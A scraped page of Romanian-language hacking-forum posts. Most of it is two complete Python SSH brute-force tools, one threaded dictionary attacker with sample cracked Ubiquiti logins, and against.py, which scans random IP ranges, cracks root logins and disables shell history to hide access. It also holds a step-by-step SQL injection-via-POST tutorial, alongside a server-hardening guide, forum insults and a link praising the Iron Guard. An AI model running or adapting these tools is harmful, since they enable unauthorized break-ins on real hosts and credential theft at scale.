Leaderboard

Hello .... RST I'm Find very interesting wiki about " Exploit Dev " References to vulnerability exploitation stuff. Exploitation - it-sec-catalog - References to vulnerability exploitation stuff. - Gathering references to IT-security related stuff. - Google Project Hosting SRC => http://code.google.com/p/it-sec-catalog/wiki/Exploitation check it out see u

Urmatorul script este un dictionary attack tool pentru SSH scris in Python. import paramiko, sys, Queue, threading class SSHBrute(threading.Thread): def __init__(self, queue): threading.Thread.__init__(self) self.queue = queue def run(self): while True: ip,user,passwd = self.queue.get() self.kraken(ip,user,passwd) self.queue.task_done() def kraken(self,ip,user,passwd): try: if ip in cracked: return False if '%user%' in str(passwd): passwd = passwd.split("%")[0] + user + passwd.split("%")[2] if '%User%' in str(passwd): pwd = user + passwd.split("%")[2] passwd = passwd.split("%")[0]+pwd.title() if str(passwd) == '%null%': passwd = '' ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) ssh.connect(ip, username=user, password=passwd, timeout=35) raw.write(ip+' '+user+' '+passwd+'\n') raw.flush() chan = ssh.get_transport().open_session() chan.settimeout(35) chan.exec_command('uname -a') data = chan.recv(1024) if len(data) == 0: nologs.write(ip+' '+user+' '+passwd+'\n') nologs.flush() return False val.write(ip+' '+user+' '+passwd+'|'+data.rstrip()+'\n') val.flush() cracked.append(ip) chan.close() ssh.close() return True except Exception, e: if 'uthent' in str(e): if dbg == 'bad': bad.write(ip+'\n') bad.flush() #print '\r[+]Tried '+ip+' '+user+' '+passwd+' ' ssh.close() return False #print ip, str(e) ssh.close() return False def brutemain(): if len(sys.argv) < 2: print """ SSH Brute Force Tool Author: @Elohim [RST] Usage: bruter ThreadNumber IpFile UserFile PassFile FilterSwitch* *The filter Switch Takes Either the word "bad" or "no". If you supply the word bad, it filters in bad.txt only the ips which indeed support ssh AUTH and password didn't work""" return False ThreadNR = int(sys.argv[1]) queue = Queue.Queue(maxsize=20000) try: i = 0 for i in range(ThreadNR): t = SSHBrute(queue) t.daemon = True t.start() i += 1 except Exception, e: print 'Cant start more than',i,'Threads!' global bad global val global nologs global cracked global raw cracked = [] bad = open('bad.txt','w') val = open('valid.txt','a') nologs = open('nologins.txt','a') raw = open('raw.txt','a') with open(str(sys.argv[2]),'rU') as ipf: ips = ipf.read().splitlines() with open(str(sys.argv[3]),'rU') as uf: users = uf.read().splitlines() with open(str(sys.argv[4]),'rU') as pf: passwords = pf.read().splitlines() global dbg dbg = str(sys.argv[5]) try: for password in passwords: for user in users: for ip in ips: queue.put((ip,user,password)) except: pass queue.join() if __name__ == "__main__": brutemain() Am dat un mic exemplu despre usage daca il porniti fara argumente. Va sfatuiesc sa trecei odata prin ip-uri cu un singur user si o parola, si argumentul bad, pentru a ramane doar cu ip-urile care accepta logarea prin SSH. Apoi va luati ip-urile din bad.txt si le folositi doar pe ele. Face 3 fisiere: raw.txt nologin.txt si valid.txt In raw.txt o sa fie puse toate, si cele care au *sh disabled, si cele care se logheaza normal. In nologin.txt o sa fie puse doar cele care suporta un ssh transport,sau nu au niciun fel de shell activ, iar in valid.txt cele care au shell activ, si li se va adauga si banner-ul ( uname -a ) exemplu de valid.txt: 68.170.**.24 ubnt ubnt|Linux Ubiquiti 2.6.32.54 #1 Thu Aug 16 13:41:25 EEST 2012 mips unknown 68.117.**.194 ubnt ubnt|Linux Ubiquiti 2.6.15-5.2 #1 Mon Dec 19 20:46:46 EET 2011 mips unknown 68.13.**.45 ubnt ubnt|Linux Ubiquiti 2.6.15-5.2 #1 Mon Dec 19 20:46:46 EET 2011 mips unknown 68.170.**.64 ubnt ubnt|Linux AirRouter 2.6.32.54 #1 Fri Mar 8 10:15:49 EET 2013 mips unknown Daca vreti sa fie verbose, si sa vedeti ce se intampla, scoate comment-urile de la print . Va trebuie paramiko, dar cine chiar vrea sa il foloseasca o sa se descurce si singur. Acesta e unu din motivele pentru care nu l-am compilat nici pt win nici pt linux. Astept pareri si posibile imbunatatiri. Nu mai dati bani pe asa zisele "scannere" sau "arhive" private.

Nu ai tu niciun drept s? faci pula mare aici pe forum. Uit?-te de când e Toshiba pe forum ?i de când e?ti tu. Uit?-te ce reputa?ie are el ?i ce reputa?ie ai tu. Gânde?te-te ?i ca el e VIP ?i tu nu. ?i cirea?a de pe tort: el are dreptate ?i tu nu (privitor la acest topic). Deci nu ai niciun drept s? faci afirma?ii gen: "nici sa nu te gandesti sa mai postezi aici"

Introducere: Ei bine, ce pot spune, m-am gandit sa ma apuc de o serie de ghiduri pentru incepatori, majoritatea referindu-se la injectia SQL. In acest ghid, voi explica cum se realizeaza injectia SQL folosind cererea datelor de tip (eu o sa numesc acest lucru, "request") POST. Ce-i ala POST? Corn cu ciocolata?! Cred ca, cu totii stim ca protocolul HTTP (HTTP/1.1) suporta request-uri de tip (de cele mai multe ori, sunt folosite request-urile de tip GET/POST): GET; POST; HEAD; OPTIONS; CONNECT; PUT; TRACE; DELETE; Request-urile de tip GET au ca rol preluarea datelor si sunt vizibile in bara de adrese a navigatorului web (de asemenea, sunt vizibile "plain text"). Spre deosebire de request-urile GET, cele POST au ca rol procesarea datelor dintr-un formular HTML cu campuri de introducere, campuri de cautare, etc., in resurse si sunt ascunse dar ele pot fi vazute in codul sursa al paginii. Realizarea injectiei: In primul rand, aveti nevoie de Live HTTP Headers. In al doilea rand, sa presupunem ca avem urmatorul formular (http://www.site.com/login.php): Inainte de a apasa pe butonul Login, deschideti Live HTTP Headers, si ar trebuii sa arate cam asa: Odata ce a-ti apasat pe butonul Login (fi-ti sigur ca a-ti bifat Capture), Live HTTP Headers ar trebuii sa capteze datele trimise la server si sa arate cam asa (dupa ce a-ti captat datele trimise catre server, debifati Capture): Din poza de mai sus, se observa clar ca inainte de a incerca sa ma loghez, am introdus un nume si o parola (chiar daca acestea erau inexistente). Acum, selectati datele trimise catre server (prima linie) si apasati pe Replay. Dupa ce a-ti apasat, ar trebuii sa apara un nou dialog in care pot fi modificati parametrii si puteti verifica daca acestia sunt vulnerabili sau nu (in cazul meu, parametrul user este vulnerabil): Cand apasam pe Replay, parametrii modificati sunt trimisi catre server, iar rezultatul va fi urmatorul: In poza de mai sus, se poate vedea clar ca site-ul poate fi injectat prin request-uri de tip POST. Acum, ca site-ul e vulnerabil, putem extrage date (in acest exemplu, o sa folosesc metoda union based si voi incerca sa aflu numarul coloanelor folosind traditionalul group by x,y,z): Dupa ce comanda a fost trimisa server-ului, pagina reintoarce urmatorul rezultat (cum ca, in baza de date se afla o singura coloana): Acum, pot incerca sa extrag versiunea bazei de date (pentru inceput): In general, ideea este simpla: dupa ce ai modificat parametrul vulnerabil dupa bunul plac, apesi pe Replay pentru a trimite comanda server-ului.

Gata bre, hoooo Multumim pentru tutorial @.darky

Daca si tu ai ajuns sa pui astfel de intrebari....Pacat ca ai uitat de unde ai plecat. On: felicitari pentru tutorial:)

UPDATE v0.2 # CHANGELOG # v0.2 # - prints kernel version after login # - optimized timings when cracking # - detection for key authentication # - false positive / small honeypot detection # - save found target ip addresses to file, -O option # - 127.x.x.x will be excluded when scanning for random ip addresses # - unsort found target ip addresses, because of sequential port scanning # - resolve ip address by given hostname # - stop attacks on target when keyboard-interactive is required # - set threads for port scanning, -s option usage: ./against.py -i <arg> | -r <arg> | -I <arg> options: -i <ip/range> ip address/ip range/domain (e.g.: 192.168.0-3.1-254) -I <file> list of targets -r <num> attack random hosts -p <num> port number of sshd (default: 22) -t <num> threads per host (default: 4) -f <num> attack max hosts parallel (default: 8) -u <username> single username (default: root) -U <file> list of usernames -l <password> single password (default: toor) -L <file> list of passwords -o <file> write found logins to file -O <file> write found target ip addresses to file -s <num> threads when port scanning (default: 200) -T <sec> timeout in seconds (default: 3) -V print version of against.py and exit examples: attack single target usage: ./against.py -i nsa.gov -L passwords.txt scanning and attacking an ip-range usage: ./against.py -i 192.168.0-10.1-254 -u admin -l troll -s 500 #!/usr/bin/env python # -*- coding: latin-1 -*- from socket import * import multiprocessing import threading import time import paramiko import sys import os import logging import argparse import random import re # version of against.py VERSION = 'v0.2' # print our nice banner def banner(): print '--==[ against.py by pgt@nullsecurity.net ]==--' # print version def version(): print '[+] against.py %s' % (VERSION) sys.exit(0) # check if we can write to file def test_file(filename): try: outfile = open(filename, 'a') outfile.close() except IOError: print '[!] ERROR: cannot write to file \'%s\'' % filename sys.exit(1) # define command line parameters and help page def argspage(): parser = argparse.ArgumentParser( usage = '\n\n ./%(prog)s -i <arg> | -r <arg> | -I <arg>', formatter_class = argparse.RawDescriptionHelpFormatter, epilog = 'examples:\n\n' ' attack single target\n' ' usage: ./%(prog)s -i nsa.gov -L passwords.txt\n\n' ' scanning and attacking an ip-range\n' ' usage: ./%(prog)s -i 192.168.0-10.1-254 -u admin -l troll -s 500', add_help = False ) options = parser.add_argument_group('options', '') options.add_argument('-i', default=False, metavar='<ip/range>', help='ip address/ip range/domain (e.g.: 192.168.0-3.1-254)') options.add_argument('-I', default=False, metavar='<file>', help='list of targets') options.add_argument('-r', default=False, metavar='<num>', help='attack random hosts') options.add_argument('-p', default=22, metavar='<num>', help='port number of sshd (default: 22)') options.add_argument('-t', default=4, metavar='<num>', help='threads per host (default: 4)') options.add_argument('-f', default=8, metavar='<num>', help='attack max hosts parallel (default: 8)') options.add_argument('-u', default='root', metavar='<username>', help='single username (default: root)') options.add_argument('-U', default=False, metavar='<file>', help='list of usernames') options.add_argument('-l', default='toor', metavar='<password>', help='single password (default: toor)') options.add_argument('-L', default=False, metavar='<file>', help='list of passwords') options.add_argument('-o', default=False, metavar='<file>', help='write found logins to file') options.add_argument('-O', default=False, metavar='<file>', help='write found target ip addresses to file') options.add_argument('-s', default=200, metavar='<num>', help='threads when port scanning (default: 200)') options.add_argument('-T', default=3, metavar='<sec>', help='timeout in seconds (default: 3)') options.add_argument('-V', action='store_true', help='print version of against.py and exit') args = parser.parse_args() if args.V: version() if (args.i == False) and (args.I == False) and (args.r == False): print '' parser.print_help() sys.exit(0) return args # write found ip addresses / logins to file def write_to_file(filename, text): outfile = open(filename, 'a') outfile.write(text) outfile.close() # connect to target and checks for an open port def scan(target, port, timeout, oips): sock = socket(AF_INET, SOCK_STREAM) sock.settimeout(timeout) result = sock.connect_ex((target, port)) sock.close() if result == 0: HOSTLIST.append(target) if oips: write_to_file(oips, target + '\n') # control the maximum number of threads def active_threads(threads, waittime): while threading.activeCount() > threads: time.sleep(waittime) # create thread and call scan() def thread_scan(args, target): port = int(args.p) timeout = float(args.T) oips = args.O threads = int(args.s) bam = threading.Thread(target=scan, args=(target, port, timeout, oips)) bam.start() active_threads(threads, 0.0001) time.sleep(0.001) # only the output when scanning for targets def scan_output(i): sys.stdout.flush() sys.stdout.write('\r[*] hosts scanned: {0} | ' \ 'possible to attack: {1}'.format(i, len(HOSTLIST))) # handle format of given target(s) def check_targets(targets): if re.match(r'^[0-9.\-]*$', targets): return targets try: target = gethostbyname(targets) return target except gaierror: print '[-] \'%s\' is unreachable' % (targets) finished() sys.exit(1) # unsort found hosts, because of incremental scanning def unsort_hostlist(): print '[*] unsort host list' for i in range(15): random.shuffle(HOSTLIST) # handle ip range format from command line def handle_ip_range(iprange): parted = tuple(part for part in iprange.split('.')) rsa = range(4) rsb = range(4) for i in range(4): hyphen = parted.find('-') if hyphen != -1: rsa = int(parted[:hyphen]) rsb = int(parted[1+hyphen:]) + 1 else: rsa = int(parted) rsb = int(parted) + 1 return (rsa, rsb) # call thread_scan() with target ip addresses def ip_range(args): targets = check_targets(args.i) rsa, rsb = handle_ip_range(targets) print '[*] scanning %s for ssh services' % targets counter = 0 for i in range(rsa[0], rsb[0]): for j in range(rsa[1], rsb[1]): for k in range(rsa[2], rsb[2]): for l in range(rsa[3], rsb[3]): target = '%d.%d.%d.%d' % (i, j, k, l) counter += 1 scan_output(counter) thread_scan(args, target) # waiting for the last running threads active_threads(1, 0.1) scan_output(counter) print '\n[*] finished scan' # create ip addresses def randip(): rand = range(4) for i in range(4): rand = random.randrange(0, 256) # exclude 127.x.x.x if rand[0] == 127: randip() ipadd = '%d.%d.%d.%d' % (rand[0], rand[1], rand[2], rand[3]) return ipadd # create random ip addresses def rand_ip(args): i = 0 print '[*] scanning random ips for ssh services' while len(HOSTLIST) < int(args.r): i += 1 scan_output(i) thread_scan(args, randip()) # waiting for the last running threads active_threads(1, 1) scan_output(i) print '\n[*] finished scan.' # checks if given filename by parameter exists def file_exists(filename): try: open(filename).readlines() except IOError: print '[!] ERROR: cannot open file \'%s\'' % filename sys.exit(1) # read-in a file with ip addresses def ip_list(ipfile): file_exists(ipfile) targets = open(ipfile).readlines() for target in targets: HOSTLIST.append(target) # connect to target and try to login def crack(target, port, user, passwd, outfile, timeo, i): ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) user = user.replace('\n', '') passwd = passwd.replace('\n', '') try: ssh.connect(target, port=port, username=user, password=passwd, timeout=timeo, pkey=None, allow_agent=False) time.sleep(3) try: ssh.exec_command('unset HISTFILE ; unset HISTSIZE') time.sleep(1) ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command('uname -a ' \ '|| cat /proc/version') output = 'kernel: %s' \ % (ssh_stdout.readlines()[0].replace('\n', '')) except: output = 'info: maybe a honeypot or false positive' login = '[+] login found for %s | %s:%s\n' \ '[!] %s' % (target, user, passwd, output) print login if outfile: write_to_file(outfile, login + '\n') ssh.close() os._exit(0) except paramiko.AuthenticationException, e: ssh.close() exception = str(e) if '[\'publickey\']' in exception: print '[-] key authentication only - ' \ 'stopped attack against %s' % (target) os._exit(1) elif '\'keyboard-interactive\'' in exception: print '[-] %s requires \'keyboard-interactive\' handler' % (target) os._exit(1) except: ssh.close() # after 3 timeouts per request the attack against $target will stopped if i < 3: i += 1 # reconnect after random seconds (between 0.6 and 1.2 sec) randtime = random.uniform(0.6, 1.2) time.sleep(randtime) crack(target, port, user, passwd, outfile, timeo, i) else: print '[-] too many timeouts - stopped attack against %s' % (target) os._exit(1) # create 'x' number of threads and call crack() def thread_it(target, args): port = int(args.p) user = args.u userlist = args.U password = args.l passlist = args.L outfile = args.o timeout = float(args.T) threads = int(args.t) if userlist: users = open(userlist).readlines() else: users = [user] if passlist: passwords = open(passlist).readlines() else: passwords = [password] # try/except looks dirty but we need it :/ try: for user in users: for password in passwords: Run = threading.Thread(target=crack, args=(target, port, user, password, outfile, timeout, 0,)) Run.start() # checks that we a max number of threads active_threads(threads, 0.01) time.sleep(0.1) # waiting for the last running threads active_threads(1, 1) except KeyboardInterrupt: os._exit(1) # create 'x' child processes (child == cracking routine for only one target) def fork_it(args): threads = int(args.t) childs = int(args.f) len_hosts = len(HOSTLIST) print '[*] attacking %d target(s)\n' \ '[*] cracking up to %d hosts parallel\n' \ '[*] threads per host: %d' % (len_hosts, childs, threads) i = 1 for host in HOSTLIST: host = host.replace('\n', '') print '[*] performing attacks against %s [%d/%d]' % (host, i, len_hosts) hostfork = multiprocessing.Process(target=thread_it, args=(host, args)) hostfork.start() # checks that we have a max number of childs while len(multiprocessing.active_children()) >= childs: time.sleep(0.001) time.sleep(0.001) i += 1 # waiting for child processes while multiprocessing.active_children(): time.sleep(1) # \(0.o)/ def empty_hostlist(): if len(HOSTLIST) == 0: print '[-] found no targets to attack!' finished() sys.exit(1) # output when against.py finished all routines def finished(): print '[*] game over!!!' def main(): banner() args = argspage() if args.U: file_exists(args.U) if args.L: file_exists(args.L) if args.o: test_file(args.o) if args.O: test_file(args.O) if args.i: ip_range(args) unsort_hostlist() elif args.I: ip_list(args.I) else: rand_ip(args) time.sleep(0.1) empty_hostlist() fork_it(args) finished() if __name__ == '__main__': HOSTLIST = [] try: logging.disable(logging.CRITICAL) main() except KeyboardInterrupt: print '\nbye bye!!!' time.sleep(0.2) os._exit(1) http://www.nullsecurity.net/tools/cracker/against.py

Salut, Invata si foloseste select + FD_CLR, FD_ISSET, FD_SET, FD_ZERO. Ce face: iti permite sa verifici daca pe unul sau mai multi socketi ai date de intrare, date de iesire sau erori. Adica daca ai primit date (in cozile din kernel) pe acel socket, daca urmeaza sa fie trimise date pe acel socket sau daca a intervenit o eroare pe acel socket, de exemplu inchiderea conexiunii. Ce e important la acest "select" e ca poti "astepta" pe un socket un anumit interval (sau poti sa nu astepti) sa se intample un astfel de eveniment (primire date de exemplu). Adica poti verifica daca pe socket ai date de intrare. Daca ai, le procesezi, daca nu ai, treci mai departe. Sau poti astepta 3000 ms sa primesti date. Dupa 3000 ms, daca ai primit date, le procesezi, daca nu, faci altceva. Nu e foarte complicat si sunt tutoriale care explica in detaliu acest syscall. PS: Daca vrei Windows, pe langa select, ai o serie completa de functii asincrone (cele cu Async) care au ca parametru o functie callback care e apelata exact cand e declansat un eveniment (ca primirea de date).

Buna.Daca tot a inceput ,,treaba cu securitatea la un server", https://rstforums.com/forum/15896-tutorial-cum-securizam-un-server.rst , propun sa va arat cum se securizeaza si elementele care fac un server sa fie functionabil. Bun , sa incepem cu APACHE. CE este apache? Apache este un server HTTP de tip open source.Apache suport? o mare varietate de module care îi extind func?ionalitatea, acestea variaz? de la server side programming ?i pân? la scheme de autentificare. Câteva limbaje suportate sunt: mod_perl, mod_python, Tcl si PHP. Ca alte module putem enumera : SSL si TLS support (mod_ssl), un modul proxyun, modul de rescriere URL (cunoscut ca un motor de rescriere mod_rewrite), custom log files (mod_log_config) ?i suport de filtrare (mod_include ?i mod_ext_filter). O alt? calitate a serverului Apache este virtual hosting (g?zduirea virtual?), care const? în posibilitatea de a g?zdui mai multe situri simultan pe acela?i server.[sursa wikipedia] Sa trecem la ... treaba. PEntru APACHE2 In primul rand ascundem ce varianta de Linux se foloseste : Intram aici : /etc/apache2/apache2.conf [ sau httpd.conf] si adaugam la sfarsit : Apoi dam un disable la listarea directoarelor : , adaugam tot in .conf. Dezinstalam modulele care nu ne intereseaza : spre exemplu : mod_imap, mod_include, mod_info, mod_userdir, mod_autoindex , cu urmatoarea comanda : Instalam mod security : Am vrut sa folosesc mod evasive, dar voi arata in .htaccess cum sa previi bruteforce Apoi turnoff la symlinks : , putem include aceasta treaba in apache.conf sau in .htaccessPunem o limita pentru upload, din partea userilor in conf : -------------------------------------------------------------------------------- Apoi facem un folder, denumit de exemplu Tot in cd/var/www/members, facem si un login pentru acces: Dam un chmod doar pentru access din interior si gata : chown root:root .htpassword Apoi sa trecem la MYSQL In primul rand, RECOMAND sa nu se foloseasca PHPMYADMIN.Sunt multe vulnerabilitati care le gasiti in phpmyadmin,explituri etc.. mai bine lucrati totul manual. Sa schimbam parola de la root : Intram in mysql : ,Executam si gata, am schimbat parola. Sa puneti o parola formata din !%@%%@##FD , peste 13 caractere recomand...Sa fim siguri , schimbam si numele de la root..Ca sa prevenim citirea fisierelor locale, in my.cnf , adaugam : , my este aflat in /etc/mysql/...*Dam un remove la default users : Schimbam numele root-ului, sau a adminului .. : mysql: update user set user="sleedSCHEMALE" where user="root"; mysql> flush privileges; Dam un remove la istoric : cat /dev/null > ~/.mysql_history Cam atat cu mySQL, sa trecem la PHP : PHP Sa avem grija ca nu avem : instalat.Sau poti verifica cu : Apoi : Dam disable la cateva module periculoase : Anti backdooring : PHPIDS (PHP-Intrusion Detection System) se poate instala ,sa verificam problemele din site... Apoi si cu .htaccess se poate modifica sa nu avem vulnerabilitati sql injection : Acest .htaccess se poate folosi si impotriva la SQL INJECTION si XSS Trebuie sa precizez ca puteti folosi SELinux pentru o buna securitate a sistemului, dupa cum ma invatat un maestru in asa ceva..Voi veni cu precizari si mai multe.Daca aveti ceva completari va rog , nu ezitati sa le adresati sau sa sesizati.Astept sa propuneti imbunatatiri, sa fac un tutorial complex de la A LA Z despre securitatea unui server.Acum ma dedic unei variante de Linux, sleenux se numeste si vreau sa fie doar pentru server, acum testez Debian 7 cum se comporta pe distro-ul meu, dar astept cu nerabdare 8 sa pot sa ma joc cum vreau cu el, sa fac un server foarte securizat.Va fi varianta Desktop.In fine, sper ca va placut, o seara buna.

O fi ajuns , no fi ajuns . Chestia asta este ilegala .

Poate ca il stiti pe darkpanda... si eu il stiu.. Dar nu stiam ca are site.. Va las sa il vizitati. Garda de fier este aici